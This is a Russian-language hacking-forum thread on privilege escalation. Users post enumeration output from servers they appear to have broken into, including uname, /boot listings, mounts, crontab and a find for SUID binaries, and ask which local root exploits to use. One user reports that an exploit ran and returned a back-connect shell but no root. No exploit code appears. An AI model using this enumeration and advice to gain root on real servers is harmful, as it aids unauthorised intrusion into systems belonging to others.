Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    uname -a:
    Code:
    FreeBSD site.com 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Sun Jul 25 23:33:02 UTC 2010     [email protected]:/usr/src/sys/amd64/compile/ISPSYSTEM  amd64

    ls -la /boot:
    Code:
    total 2004
    drwxr-xr-x   7 root  wheel    1024 Sep 19  2010 .
    drwxr-xr-x  22 root  wheel     512 Sep  1 00:11 ..
    -r--r--r--   1 root  wheel    7647 Jul 19  2010 beastie.4th
    -r--r--r--   1 root  wheel    8192 Jul 19  2010 boot
    -r--r--r--   1 root  wheel     512 Jul 19  2010 boot0
    -r--r--r--   1 root  wheel     512 Jul 19  2010 boot0sio
    -r--r--r--   1 root  wheel     512 Jul 19  2010 boot1
    -r--r--r--   1 root  wheel    7680 Jul 19  2010 boot2
    -r--r--r--   1 root  wheel    1201 Jul 19  2010 cdboot
    drwxr-xr-x   2 root  wheel     512 Jul 19  2010 defaults
    -r--r--r--   1 root  wheel     703 Jul 19  2010 device.hints
    drwxr-xr-x   2 root  wheel     512 Jul 19  2010 firmware
    -r--r--r--   1 root  wheel    2262 Jul 19  2010 frames.4th
    -r--r--r--   1 root  wheel    7535 Jul 19  2010 gptboot
    -r--r--r--   1 root  wheel   26895 Jul 19  2010 gptzfsboot
    drwxr-xr-x   2 root  wheel   29184 Sep 19  2010 kernel
    -r-xr-xr-x   1 root  wheel  233472 Jul 19  2010 loader
    -r--r--r--   1 root  wheel    5865 Jul 19  2010 loader.4th
    -rw-r--r--   1 root  wheel      35 Sep 19  2010 loader.conf
    -r--r--r--   1 root  wheel   15219 Jul 19  2010 loader.help
    -r--r--r--   1 root  wheel     396 Jul 19  2010 loader.rc
    -r--r--r--   1 root  wheel     512 Jul 19  2010 mbr
    drwxr-xr-x   2 root  wheel     512 Jul 19  2010 modules
    -r--r--r--   1 root  wheel     512 Jul 19  2010 pmbr
    -r--r--r--   1 root  wheel  235520 Jul 19  2010 pxeboot
    -r--r--r--   1 root  wheel     703 Jul 19  2010 screen.4th
    -r--r--r--   1 root  wheel   35136 Jul 19  2010 support.4th
    drwxr-xr-x   2 root  wheel     512 Jul 19  2010 zfs
    -r--r--r--   1 root  wheel   33280 Jul 19  2010 zfsboot
    -r-xr-xr-x   1 root  wheel  253952 Jul 19  2010 zfsloader

    mount:
    Code:
    /dev/mfid0s1a on / (ufs, local)
    devfs on /dev (devfs, local, multilabel)
    /dev/mfid0s1e on /tmp (ufs, local, soft-updates)
    /dev/mfid0s1f on /usr (ufs, local, with quotas, soft-updates)
    /dev/mfid0s1d on /var (ufs, local, soft-updates)
    df -h:
    Code:
    Filesystem       Size    Used   Avail Capacity  Mounted on
    /dev/mfid0s1a    496M    310M    146M    68%    /
    devfs            1.0K    1.0K      0B   100%    /dev
    /dev/mfid0s1e    496M    161M    295M    35%    /tmp
    /dev/mfid0s1f    1.7T     66G    1.5T     4%    /usr
    /dev/mfid0s1d     16G    4.9G     10G    32%    /var
    
    cat /etc/crontab:
    Code:
    # /etc/crontab - root's crontab for FreeBSD
    #
    # $FreeBSD: src/etc/crontab,v 1.33.2.1.4.1 2010/06/14 02:09:06 kensmith Exp $
    #
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
    #
    #minute    hour    mday    month    wday    who    command
    #
    */5    *    *    *    *    root    /usr/libexec/atrun
    #
    # Save some entropy so that /dev/random can re-seed on boot.
    */11    *    *    *    *    operator /usr/libexec/save-entropy
    #
    # Rotate log files every hour, if necessary.
    0    *    *    *    *    root    newsyslog
    #
    # Perform daily/weekly/monthly maintenance.
    1    3    *    *    *    root    periodic daily
    15    4    *    *    6    root    periodic weekly
    30    5    1    *    *    root    periodic monthly
    #
    # Adjust the time zone if the CMOS clock keeps local time, as opposed to
    # UTC time.  See adjkerntz(8) for details.
    1,31    0-5    *    *    *    root    adjkerntz -a
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    Code:
    -r-sr-xr-x  1 root  wheel  1008224 Apr 11  2011 /tmp/asd/bin/billmgr
    -r-sr-xr-x  1 root  wheel  8176 Apr 11  2011 /tmp/asd/cgi/billmgr
    -r-sr-xr-x  1 root  wheel  42688 Apr 11  2011 /tmp/asd/cgi/xml2csv
    -r-sr-xr-x  1 root  wheel  105800 Apr 11  2011 /tmp/asd/cgi/report
    -r-sr-xr-x  1 root  wheel  50728 Apr 11  2011 /tmp/asd/cgi/getattach
    -r-sr-xr-x  1 root  wheel  52904 Apr 11  2011 /tmp/asd/cgi/getdcfile
    -r-sr-xr-x  1 root  wheel  70960 Apr 11  2011 /tmp/asd/cgi/ajaxupload
    -r-sr-xr-x  1 root  wheel  67944 Apr 11  2011 /tmp/asd/cgi/goserver
    -r-sr-xr-x  1 root  wheel  50344 Apr 11  2011 /tmp/asd/cgi/whoiscgi
    -r-sr-xr-x  1 root  wheel  50280 Apr 11  2011 /tmp/asd/cgi/domainlist
    -r-sr-xr-x  1 root  wheel  61928 Apr 11  2011 /tmp/asd/cgi/billupload
    -r-sr-xr-x  1 root  wheel  43848 Apr 11  2011 /tmp/asd/cgi/domaininfo
    -r-sr-xr-x  1 root  wheel  20832 Apr 11  2011 /tmp/asd/cgi/partnerprogram
    -r-sr-xr-x  1 root  wheel  30464 Apr 11  2011 /tmp/asd/cgi/click
    -r-sr-xr-x  1 root  wheel  44296 Apr 11  2011 /tmp/asd/cgi/ympayment
    -r-sr-xr-x  1 root  wheel  49384 Apr 11  2011 /tmp/asd/cgi/ymresult
    -r-sr-xr-x  1 root  wheel  49224 Apr 11  2011 /tmp/asd/cgi/ymcheck
    -r-sr-xr-x  1 root  wheel  32392 Apr 11  2011 /tmp/asd/cgi/ymfail
    -r-sr-xr-x  1 root  wheel  32392 Apr 11  2011 /tmp/asd/cgi/ymsuccess
    -r-sr-xr-x  1 root  wheel  44840 Apr 11  2011 /tmp/asd/cgi/wmpayment
    -r-sr-xr-x  1 root  wheel  45416 Apr 11  2011 /tmp/asd/cgi/wmresult
    -r-sr-xr-x  1 root  wheel  49096 Apr 11  2011 /tmp/asd/cgi/assistpayment
    -r-sr-xr-x  1 root  wheel  62960 Apr 11  2011 /tmp/asd/cgi/assistresult
    -r-sr-xr-x  1 root  wheel  44424 Apr 11  2011 /tmp/asd/cgi/rbkpayment
    -r-sr-xr-x  1 root  wheel  45384 Apr 11  2011 /tmp/asd/cgi/rbkresult
    -r-sr-xr-x  1 root  wheel  53832 Apr 11  2011 /tmp/asd/cgi/cyberresult
    -r-sr-xr-x  1 root  wheel  45832 Apr 11  2011 /tmp/asd/cgi/cyberpayment
    -r-sr-xr-x  1 root  wheel  45064 Apr 11  2011 /tmp/asd/cgi/roboxresult
    -r-sr-xr-x  1 root  wheel  44424 Apr 11  2011 /tmp/asd/cgi/roboxpayment
    -r-sr-xr-x  1 root  wheel  53608 Apr 11  2011 /tmp/asd/cgi/mobilmresult
    -r-sr-xr-x  1 root  wheel  44392 Apr 11  2011 /tmp/asd/cgi/zppayment
    -r-sr-xr-x  1 root  wheel  45256 Apr 11  2011 /tmp/asd/cgi/zpresult
    -r-sr-xr-x  1 root  wheel  56104 Apr 11  2011 /tmp/asd/cgi/osmpresult
    -r-sr-xr-x  1 root  wheel  44488 Apr 11  2011 /tmp/asd/cgi/intellimoneypayment
    -r-sr-xr-x  1 root  wheel  45448 Apr 11  2011 /tmp/asd/cgi/intellimoneyresult
    -r-sr-xr-x  1 root  wheel  57720 Apr 11  2011 /tmp/asd/cgi/liqpaypayment
    -r-sr-xr-x  1 root  wheel  70328 Apr 11  2011 /tmp/asd/cgi/liqpayresult
    -r-sr-xr-x  1 root  wheel  45712 Apr 11  2011 /tmp/asd/cgi/privatpayment
    -r-sr-xr-x  1 root  wheel  71928 Apr 11  2011 /tmp/asd/cgi/privatresult
    -r-sr-xr-x  1 root  wheel  62224 Apr 11  2011 /tmp/asd/cgi/moneybookersresult
    -r-sr-xr-x  1 root  wheel  62224 Apr 11  2011 /tmp/asd/cgi/moneybookerspayment
    -r-sr-xr-x  1 root  wheel  49096 Apr 11  2011 /tmp/asd/cgi/onpaypayment
    -r-sr-xr-x  1 root  wheel  50696 Apr 11  2011 /tmp/asd/cgi/onpayresult
    -r-sr-xr-x  1 root  wheel  44392 Apr 11  2011 /tmp/asd/cgi/prochangepayment
    -r-sr-xr-x  1 root  wheel  44520 Apr 11  2011 /tmp/asd/cgi/prochangeresult
    -r-sr-xr-x  1 root  wheel  48680 Apr 11  2011 /tmp/asd/cgi/pppayment
    -r-sr-xr-x  1 root  wheel  63152 Apr 11  2011 /tmp/asd/cgi/ppresult
    -r-sr-xr-x  1 root  wheel  44296 Apr 11  2011 /tmp/asd/cgi/2copayment
    -r-sr-xr-x  1 root  wheel  48936 Apr 11  2011 /tmp/asd/cgi/2coresult
    -r-sr-xr-x  1 root  wheel  48848 Apr 11  2011 /tmp/asd/cgi/quantgwpayment
    -r-sr-xr-x  1 root  wheel  48936 Apr 11  2011 /tmp/asd/cgi/quantgwresult
    -r-sr-xr-x  1 root  wheel  49520 Apr 11  2011 /tmp/asd/cgi/anpayment
    -r-sr-xr-x  1 root  wheel  48872 Apr 11  2011 /tmp/asd/cgi/anresult
    -r-sr-xr-x  1 root  wheel  5152 Apr 11  2011 /tmp/asd/sbin/suexec
    -r-sr-xr-x  1 root  wheel  116616 Apr 11  2011 /tmp/asd/sbin/gatemail
    -r-sr-xr-x  4 root  wheel  30136 Jul 19  2010 /usr/bin/at
    -r-sr-xr-x  4 root  wheel  30136 Jul 19  2010 /usr/bin/atq
    -r-sr-xr-x  4 root  wheel  30136 Jul 19  2010 /usr/bin/atrm
    -r-sr-xr-x  4 root  wheel  30136 Jul 19  2010 /usr/bin/batch
    -r-sr-xr-x  6 root  wheel  22848 Jul 19  2010 /usr/bin/chpass
    -r-sr-xr-x  6 root  wheel  22848 Jul 19  2010 /usr/bin/chfn
    -r-sr-xr-x  6 root  wheel  22848 Jul 19  2010 /usr/bin/chsh
    -r-sr-xr-x  6 root  wheel  22848 Jul 19  2010 /usr/bin/ypchpass
    -r-sr-xr-x  6 root  wheel  22848 Jul 19  2010 /usr/bin/ypchfn
    -r-sr-xr-x  6 root  wheel  22848 Jul 19  2010 /usr/bin/ypchsh
    -r-sr-xr-x  1 root  wheel  11568 Jul 19  2010 /usr/bin/lock
    -r-sr-xr-x  1 root  wheel  25488 Jul 19  2010 /usr/bin/login
    -r-sr-xr-x  1 root  wheel  7128 Jul 19  2010 /usr/bin/opieinfo
    -r-sr-xr-x  1 root  wheel  14088 Jul 19  2010 /usr/bin/opiepasswd
    -r-sr-xr-x  2 root  wheel  8224 Jul 19  2010 /usr/bin/passwd
    -r-sr-xr-x  2 root  wheel  8224 Jul 19  2010 /usr/bin/yppasswd
    -r-sr-xr-x  1 root  wheel  14128 Jul 19  2010 /usr/bin/rlogin
    -r-sr-xr-x  1 root  wheel  11640 Jul 19  2010 /usr/bin/rsh
    -r-sr-xr-x  1 root  wheel  16936 Jul 19  2010 /usr/bin/su
    -r-sr-xr-x  1 root  wheel  33960 Jul 19  2010 /usr/bin/crontab
    -r-sr-sr-x  1 root  daemon  34328 Jul 19  2010 /usr/bin/lpq
    -r-sr-sr-x  1 root  daemon  34528 Jul 19  2010 /usr/bin/lpr
    -r-sr-sr-x  1 root  daemon  30344 Jul 19  2010 /usr/bin/lprm
    -r-sr-xr-x  1 root  wheel  1441528 Nov  3 08:06 /usr/local/ispmgr/bin/ispmgr
    -r-sr-xr-x  1 root  wheel  1400376 Sep  8 09:29 /usr/local/ispmgr/bin/billmgr
    -r-sr-xr-x  1 root  wheel  8472 Mar 13  2012 /usr/local/ispmgr/cgi/ispmgr
    -r-sr-xr-x  1 root  wheel  61808 Aug  1  2013 /usr/local/ispmgr/cgi/cronrun
    -r-sr-xr-x  1 root  wheel  57488 Aug  1  2013 /usr/local/ispmgr/cgi/mindterm
    -r-sr-xr-x  1 root  wheel  45320 Jun  1 08:45 /usr/local/ispmgr/cgi/xml2csv
    -r-sr-xr-x  1 root  wheel  29752 Sep  6  2012 /usr/local/ispmgr/cgi/outlook
    -r-sr-xr-x  1 root  wheel  35864 Aug  1  2013 /usr/local/ispmgr/cgi/dbdownload
    -r-sr-xr-x  1 root  wheel  62704 Aug  1  2013 /usr/local/ispmgr/cgi/download
    -r-sr-xr-x  1 root  wheel  61672 Aug  1  2013 /usr/local/ispmgr/cgi/upload
    -r-sr-xr-x  1 root  wheel  165760 Nov  3 08:09 /usr/local/ispmgr/cgi/bdownload
    -r-sr-xr-x  1 root  wheel  165792 Nov  3 08:09 /usr/local/ispmgr/cgi/getuser
    -r-sr-xr-x  1 root  wheel  8336 Nov 29  2011 /usr/local/ispmgr/cgi/dnsmgr
    -r-sr-xr-x  1 root  wheel  8336 Nov 17  2011 /usr/local/ispmgr/cgi/ipmgr
    -r-sr-xr-x  1 root  wheel  8472 Sep 19  2012 /usr/local/ispmgr/cgi/billmgr
    -r-sr-xr-x  1 root  wheel  138800 Apr  7  2015 /usr/local/ispmgr/cgi/report
    -r-sr-xr-x  1 root  wheel  59024 Oct 16  2014 /usr/local/ispmgr/cgi/getattach
    -r-sr-xr-x  1 root  wheel  58832 Oct 16  2014 /usr/local/ispmgr/cgi/getdcfile
    -r-sr-xr-x  1 root  wheel  99640 Apr 28  2015 /usr/local/ispmgr/cgi/ajaxupload
    -r-sr-xr-x  1 root  wheel  73392 Mar  6  2015 /usr/local/ispmgr/cgi/goserver
    -r-sr-xr-x  1 root  wheel  54640 Jun 21  2012 /usr/local/ispmgr/cgi/whoiscgi
    -r-sr-xr-x  1 root  wheel  54416 Jun 21  2012 /usr/local/ispmgr/cgi/domainlist
    -r-sr-xr-x  1 root  wheel  62632 Apr  7  2015 /usr/local/ispmgr/cgi/billupload
    -r-sr-xr-x  1 root  wheel  20920 Aug 22  2012 /usr/local/ispmgr/cgi/partnerprogram
    -r-sr-xr-x  1 root  wheel  34008 Oct  1  2014 /usr/local/ispmgr/cgi/click
    -r-sr-xr-x  1 root  wheel  49040 Apr 28  2015 /usr/local/ispmgr/cgi/ympayment
    -r-sr-xr-x  1 root  wheel  56400 Apr 28  2015 /usr/local/ispmgr/cgi/ymresult
    -r-sr-xr-x  1 root  wheel  52688 Apr 28  2015 /usr/local/ispmgr/cgi/ymcheck
    -r-sr-xr-x  1 root  wheel  33360 Apr 28  2015 /usr/local/ispmgr/cgi/ymfail
    -r-sr-xr-x  1 root  wheel  33360 Apr 28  2015 /usr/local/ispmgr/cgi/ymsuccess
    -r-sr-xr-x  1 root  wheel  48816 Apr 28  2015 /usr/local/ispmgr/cgi/wmpayment
    -r-sr-xr-x  1 root  wheel  58400 Apr 28  2015 /usr/local/ispmgr/cgi/wmresult
    -r-sr-xr-x  1 root  wheel  49360 Apr 28  2015 /usr/local/ispmgr/cgi/assistpayment
    -r-sr-xr-x  1 root  wheel  49296 Apr 28  2015 /usr/local/ispmgr/cgi/assistresult
    -r-sr-xr-x  1 root  wheel  48656 Apr 28  2015 /usr/local/ispmgr/cgi/rbkpayment
    -r-sr-xr-x  1 root  wheel  45392 Apr 28  2015 /usr/local/ispmgr/cgi/rbkresult
    -r-sr-xr-x  1 root  wheel  49168 Apr 28  2015 /usr/local/ispmgr/cgi/cyberpayment
    -r-sr-xr-x  1 root  wheel  54064 Apr 28  2015 /usr/local/ispmgr/cgi/cyberresult
    -r-sr-xr-x  1 root  wheel  48784 Apr 28  2015 /usr/local/ispmgr/cgi/roboxresult
    -r-sr-xr-x  1 root  wheel  44528 Apr 28  2015 /usr/local/ispmgr/cgi/roboxpayment
    -r-sr-xr-x  1 root  wheel  53200 Apr 28  2015 /usr/local/ispmgr/cgi/mobilmresult
    -r-sr-xr-x  1 root  wheel  48688 Apr 28  2015 /usr/local/ispmgr/cgi/zppayment
    -r-sr-xr-x  1 root  wheel  45712 Apr 28  2015 /usr/local/ispmgr/cgi/zpresult
    -r-sr-xr-x  1 root  wheel  56432 Apr 28  2015 /usr/local/ispmgr/cgi/osmpresult
    -r-sr-xr-x  1 root  wheel  48656 Apr 28  2015 /usr/local/ispmgr/cgi/intellimoneypayment
    -r-sr-xr-x  1 root  wheel  49552 Apr 28  2015 /usr/local/ispmgr/cgi/intellimoneyresult
    -r-sr-xr-x  1 root  wheel  60640 Apr 28  2015 /usr/local/ispmgr/cgi/liqpaypayment
    -r-sr-xr-x  1 root  wheel  90720 Apr 28  2015 /usr/local/ispmgr/cgi/liqpayresult
    -r-sr-xr-x  1 root  wheel  53432 Apr 28  2015 /usr/local/ispmgr/cgi/privatpayment
    -r-sr-xr-x  1 root  wheel  76544 Apr 28  2015 /usr/local/ispmgr/cgi/privatresult
    -r-sr-xr-x  1 root  wheel  49104 Apr 28  2015 /usr/local/ispmgr/cgi/pppayment
    -r-sr-xr-x  1 root  wheel  64984 Apr 28  2015 /usr/local/ispmgr/cgi/moneybookersresult
    -r-sr-xr-x  1 root  wheel  65784 Apr 28  2015 /usr/local/ispmgr/cgi/moneybookerspayment
    -r-sr-xr-x  1 root  wheel  53136 Apr 28  2015 /usr/local/ispmgr/cgi/ppresult
    -r-sr-xr-x  1 root  wheel  44336 Apr 28  2015 /usr/local/ispmgr/cgi/2copayment
    -r-sr-xr-x  1 root  wheel  49296 Apr 28  2015 /usr/local/ispmgr/cgi/2coresult
    -r-sr-xr-x  1 root  wheel  48888 Apr 28  2015 /usr/local/ispmgr/cgi/quantgwpayment
    -r-sr-xr-x  1 root  wheel  49008 Apr 28  2015 /usr/local/ispmgr/cgi/quantgwresult
    -r-sr-xr-x  1 root  wheel  53304 Apr 28  2015 /usr/local/ispmgr/cgi/anpayment
    -r-sr-xr-x  1 root  wheel  48976 Apr 28  2015 /usr/local/ispmgr/cgi/anresult
    -r-sr-xr-x  1 root  wheel  58256 Apr  7  2015 /usr/local/ispmgr/cgi/domaininfo
    -r-sr-xr-x  1 root  wheel  44752 Apr 28  2015 /usr/local/ispmgr/cgi/prochangeresult
    -r-sr-xr-x  1 root  wheel  57808 Apr 28  2015 /usr/local/ispmgr/cgi/onpayresult
    -r-sr-xr-x  1 root  wheel  44496 Apr 28  2015 /usr/local/ispmgr/cgi/prochangepayment
    -r-sr-xr-x  1 root  wheel  49392 Apr 28  2015 /usr/local/ispmgr/cgi/onpaypayment
    -r-sr-xr-x  1 root  wheel  48944 Apr 28  2015 /usr/local/ispmgr/cgi/interkassapayment
    -r-sr-xr-x  1 root  wheel  49136 Apr 28  2015 /usr/local/ispmgr/cgi/interkassaresult
    -r-sr-xr-x  1 root  wheel  87544 Aug 13 08:07 /usr/local/ispmgr/cgi/save2pdf
    -r-sr-xr-x  1 root  wheel  49040 Apr 28  2015 /usr/local/ispmgr/cgi/a1payresult
    -r-sr-xr-x  1 root  wheel  44496 Apr 28  2015 /usr/local/ispmgr/cgi/a1paypayment
    -r-sr-xr-x  1 root  wheel  16632 Oct  1  2014 /usr/local/ispmgr/cgi/login
    -r-sr-xr-x  1 root  wheel  63472 Aug  1  2013 /usr/local/ispmgr/cgi/certdownload
    -r-sr-xr-x  1 root  wheel  58040 Apr 28  2015 /usr/local/ispmgr/cgi/pdresult
    -r-sr-xr-x  1 root  wheel  44368 Apr 28  2015 /usr/local/ispmgr/cgi/mobimpayment
    -r-sr-xr-x  1 root  wheel  66768 Aug 22  2012 /usr/local/ispmgr/cgi/cacgi
    -r-sr-xr-x  1 root  wheel  58168 Apr 28  2015 /usr/local/ispmgr/cgi/paydollar
    -r-sr-xr-x  1 root  wheel  49296 Apr 28  2015 /usr/local/ispmgr/cgi/newassistresult
    -r-sr-xr-x  1 root  wheel  48944 Apr 28  2015 /usr/local/ispmgr/cgi/paymasterpayment
    -r-sr-xr-x  1 root  wheel  49168 Apr 28  2015 /usr/local/ispmgr/cgi/newassistpayment
    -r-sr-xr-x  1 root  wheel  59360 Apr 28  2015 /usr/local/ispmgr/cgi/paymasterresult
    -r-sr-xr-x  1 root  wheel  49168 Apr 28  2015 /usr/local/ispmgr/cgi/w2ppayment
    -r-sr-xr-x  1 root  wheel  53872 Apr 28  2015 /usr/local/ispmgr/cgi/w2presult
    -r-sr-xr-x  1 root  wheel  30312 Nov 12  2014 /usr/local/ispmgr/cgi/getkb
    -r-sr-xr-x  1 root  wheel  73040 Apr 28  2015 /usr/local/ispmgr/cgi/telepayresult
    -r-sr-xr-x  1 root  wheel  36976 Apr 28  2015 /usr/local/ispmgr/cgi/tptest
    -r-sr-xr-x  1 root  wheel  49104 Apr 28  2015 /usr/local/ispmgr/cgi/webpaypayment
    -r-sr-xr-x  1 root  wheel  48976 Apr 28  2015 /usr/local/ispmgr/cgi/webpayresult
    -r-sr-xr-x  1 root  wheel  80920 Apr 28  2015 /usr/local/ispmgr/cgi/cybermobilepayment
    -r-sr-xr-x  1 root  wheel  83320 Apr 28  2015 /usr/local/ispmgr/cgi/successresult
    -r-sr-xr-x  1 root  wheel  49168 Apr 28  2015 /usr/local/ispmgr/cgi/unitellerresult
    -r-sr-xr-x  1 root  wheel  49488 Apr 28  2015 /usr/local/ispmgr/cgi/unitellerpayment
    -r-sr-xr-x  1 root  wheel  51184 Apr 28  2015 /usr/local/ispmgr/cgi/popayment
    -r-sr-xr-x  1 root  wheel  59248 Apr 28  2015 /usr/local/ispmgr/cgi/poresult
    -r-sr-xr-x  1 root  wheel  53528 Apr 28  2015 /usr/local/ispmgr/cgi/upcpayment
    -r-sr-xr-x  1 root  wheel  48760 Apr 28  2015 /usr/local/ispmgr/cgi/upcresult
    -r-sr-xr-x  1 root  wheel  49424 Apr 28  2015 /usr/local/ispmgr/cgi/waytopayresult
    -r-sr-xr-x  1 root  wheel  45488 Apr 28  2015 /usr/local/ispmgr/cgi/waytopaypayment
    -r-sr-xr-x  1 root  wheel  49072 Apr 28  2015 /usr/local/ispmgr/cgi/braspagpayment
    -r-sr-xr-x  1 root  wheel  61472 Apr 28  2015 /usr/local/ispmgr/cgi/ymnotifyresult
    -r-sr-xr-x  1 root  wheel  49296 Apr 28  2015 /usr/local/ispmgr/cgi/ymnotifypayment
    -r-sr-xr-x  1 root  wheel  57184 Sep 12  2013 /usr/local/ispmgr/cgi/libertyresult
    -r-sr-xr-x  1 root  wheel  49040 Sep 12  2013 /usr/local/ispmgr/cgi/libertypayment
    -r-sr-xr-x  1 root  wheel  75800 Apr 28  2015 /usr/local/ispmgr/cgi/copaycoresult
    -r-sr-xr-x  1 root  wheel  49296 Apr 28  2015 /usr/local/ispmgr/cgi/copaycopayment
    -r-sr-xr-x  1 root  wheel  49488 Apr 28  2015 /usr/local/ispmgr/cgi/okpayresult
    -r-sr-xr-x  1 root  wheel  48720 Apr 28  2015 /usr/local/ispmgr/cgi/okpaypayment
    -r-sr-xr-x  1 root  wheel  49552 Apr 28  2015 /usr/local/ispmgr/cgi/bank24payment
    -r-sr-xr-x  1 root  wheel  49200 Apr 28  2015 /usr/local/ispmgr/cgi/bank24result
    -r-sr-xr-x  1 root  wheel  5800 Sep  8 09:29 /usr/local/ispmgr/sbin/suexec
    -r-sr-xr-x  1 root  wheel  75304 Nov  5  2013 /usr/local/ispmgr/sbin/responder
    -r-sr-xr-x  1 root  wheel  34856 Aug  1  2013 /usr/local/ispmgr/sbin/vacation
    -r-sr-xr-x  1 root  wheel  1146432 Nov  3 08:07 /usr/local/ispmgr/sbin/pbackup
    -r-sr-xr-x  1 root  wheel  1733296 Nov  3 08:08 /usr/local/ispmgr/sbin/usermove
    -r-sr-xr-x  1 root  wheel  160208 Jul 13 12:53 /usr/local/ispmgr/sbin/gatemail
    -r-sr-xr-x  1 root  wheel  49232 Apr 28  2015 /usr/local/ispmgr/sbin/mobimresult
    -r-sr-xr-x  1 root  wheel  432024 Apr  7  2015 /usr/local/ispmgr/sbin/billbackup
    ---s--x--x  2 root  wheel  162136 Oct 16  2010 /usr/local/bin/sudoedit
    ---s--x--x  2 root  wheel  162136 Oct 16  2010 /usr/local/bin/sudo
    -rwsr-xr-x  1 root  wheel  18120 Oct 25  2010 /usr/local/bin/pkexec
    -rwsr-sr-x  1 root  mail  92984 Oct 25  2012 /usr/local/bin/procmail
    -rwsr-x---  1 root  messagebus  254752 Oct 25  2010 /usr/local/libexec/dbus-daemon-launch-helper
    -rwsr-xr-x  1 root  wheel  11520 Oct 25  2010 /usr/local/libexec/polkit-agent-helper-1
    -r-sr-xr-x  1 root  wheel  55464 Feb 21  2011 /usr/local/sbin/mtr
    -r-sr-sr-x  1 root  authpf  19856 Jul 19  2010 /usr/sbin/authpf
    -r-sr-x---  1 root  network  401320 Jul 19  2010 /usr/sbin/ppp
    -r-sr-xr-x  1 root  wheel  21176 Jul 19  2010 /usr/sbin/timedc
    -r-sr-xr-x  1 root  wheel  27216 Jul 19  2010 /usr/sbin/traceroute
    -r-sr-xr-x  1 root  wheel  24480 Jul 19  2010 /usr/sbin/traceroute6
    
    Все что было, всего чего здесь нет -- не было вывода. Помогите с сервом, впервый раз рутаю.
     
  2. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
  3. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Компилиться без ошибок, выполняю -- бэк дает, все отрабатывает, а рута нету. Не работает(((
     
  4. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Подскажите чем штуку такую пробить можно...)
    uname -a
    Linux 2.6.18 #1 SMP Mon Jul 1 22:13:01 MSD 2013 i686 i686 i386 GNU/Linux
    Остальная собранная инфа:
    http://pastebin.com/z9eN9Fif
     
  5. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Есть что под сие?
    uname -a
    Code:
    Linux ***.com 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
    ls -la /boot
    Code:
    total 43336
    dr-xr-xr-x.  4 root root  4096 Oct 14  2014 .
    dr-xr-xr-x. 22 root root  4096 Oct  8 03:44 ..
    -rw-r--r--.  1 root root  171 Sep  9  2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac
    -rw-r--r--.  1 root root  166 Nov 21  2013 .vmlinuz-2.6.32-431.el6.x86_64.hmac
    -rw-r--r--.  1 root root  2519815 Sep  9  2014 System.map-2.6.32-431.29.2.el6.x86_64
    -rw-r--r--.  1 root root  2518236 Nov 21  2013 System.map-2.6.32-431.el6.x86_64
    -rw-r--r--.  1 root root  105200 Sep  9  2014 config-2.6.32-431.29.2.el6.x86_64
    -rw-r--r--.  1 root root  105195 Nov 21  2013 config-2.6.32-431.el6.x86_64
    drwxr-xr-x.  3 root root  4096 Oct 13  2014 efi
    drwxr-xr-x.  2 root root  4096 Oct 14  2014 grub
    -rw-------.  1 root root 15220904 Oct 14  2014 initramfs-2.6.32-431.29.2.el6.x86_64.img
    -rw-------.  1 root root 15216205 Oct 13  2014 initramfs-2.6.32-431.el6.x86_64.img
    -rw-r--r--.  1 root root  193945 Sep  9  2014 symvers-2.6.32-431.29.2.el6.x86_64.gz
    -rw-r--r--.  1 root root  193758 Nov 21  2013 symvers-2.6.32-431.el6.x86_64.gz
    -rwxr-xr-x.  1 root root  4131984 Sep  9  2014 vmlinuz-2.6.32-431.29.2.el6.x86_64
    -rwxr-xr-x.  1 root root  4128368 Nov 21  2013 vmlinuz-2.6.32-431.el6.x86_64
    ls -la --full-time /lib
    Code:
    total 32
    dr-xr-xr-x.  8 root root 4096 2014-10-15 04:08:41.135969938 -0400 .
    dr-xr-xr-x. 22 root root 4096 2015-10-08 03:44:57.976293544 -0400 ..
    lrwxrwxrwx  1 root root  14 2014-10-15 04:08:41.135969938 -0400 cpp -> ../usr/bin/cpp
    drwxr-xr-x. 42 root root 4096 2014-10-14 12:23:53.729344301 -0400 firmware
    drwxr-xr-x.  6 root root 4096 2014-10-13 09:33:41.365999951 -0400 kbd
    dr-xr-xr-x.  4 root root 4096 2014-10-14 12:24:20.285344296 -0400 modules
    drwxr-xr-x.  2 root root 4096 2013-11-22 09:06:19.000000000 -0500 security
    drwxr-xr-x.  6 root root 4096 2014-10-13 09:31:54.435999970 -0400 terminfo
    drwxr-xr-x.  5 root root 4096 2014-10-14 12:24:19.398344296 -0400 udev

    mount

    Code:
    /dev/sda1 on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda8 on /home type ext4 (rw)
    /dev/sda5 on /tmp type ext4 (rw)
    /dev/sda6 on /usr type ext4 (rw)
    /dev/sda7 on /usr/local type ext4 (rw)
    /dev/sda3 on /var type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    tmpfs on /mnt/ram type tmpfs (rw,size=20m)

    df -h

    Code:
    Filesystem  Size  Used Avail Use% Mounted on
    /dev/sda1  16G  828M  15G  6% /
    tmpfs  7.8G  0  7.8G  0% /dev/shm
    /dev/sda8  412G  25G  367G  7% /home
    /dev/sda5  16G  232M  15G  2% /tmp
    /dev/sda6  16G  817M  15G  6% /usr
    /dev/sda7  16G  7.6G  7.4G  51% /usr/local
    /dev/sda3  60G  4.6G  52G  9% /var
    tmpfs  20M  7.3M  13M  37% /mnt/ram
    cat /etc/issue
